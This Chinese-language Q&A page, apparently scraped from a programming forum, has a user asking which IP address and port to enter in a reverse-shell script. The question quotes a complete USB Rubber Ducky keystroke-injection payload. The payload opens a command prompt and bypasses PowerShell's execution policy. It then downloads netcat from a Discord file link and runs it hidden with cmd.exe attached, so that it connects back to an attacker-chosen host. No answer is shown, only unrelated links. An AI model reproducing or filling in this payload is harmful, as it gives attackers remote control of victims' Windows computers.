shell - 我应该在这个反向外壳中放入什么?
问题描述
我试图理解这一点,这是我需要理解的一项任务。我知道这是一种反向外壳,但我不明白所需的输入。在这段代码中,它询问端口,我猜它是服务器的端口,以及 IP,我不确定我应该放什么 IP。我猜测它应该是注册数据的 PC 的 IP,我猜它可能是攻击者的计算机。而且我知道那里的链接应该托管实际的有效负载文件。
REM Change The IP and the Port, and for the netcat download link you can use it but it sure will expired so change it
REM subscribe to my YouTube channel https://www.youtube.com/channel/UCL5HhLmJ7gSkf9zQu39LRoQ (dont really post anything related to this tho xD)
REM for the ip address and the port pls do remove this symbol (<>)
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd / & mkdir win & cd win & echo (wget 'https://cdn.discordapp.com/attachments/823520101415911464/826813046500491264/nc64.exe' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000
STRING START /MIN a.exe <IP ADDRESS> <PORT> -e cmd.exe -d & exit
ENTER
解决方案
推荐阅读
- looker - Looker 单元测试在开发中的价值与开发中的价值
- amazon-web-services - 在使用 cloudfront 在 aws 上托管 s3 静态网站时,出现错误
- node.js - 用于单独查询的节点 Mongoose 单独索引
- c# - 在 Blazor 组件中运行的后台线程和事件处理程序
- swift - 更改全局变量的图像名称 - swift
- java - 方法不预先确定集合的分配
- pdf - 从 Servlet 返回时无法下载 JSF PDF
- java - Java reactor:不适当的阻塞方法调用
- javascript - Javascript AG-Grid 获取和显示数据
- c++ - C++ 类型的项目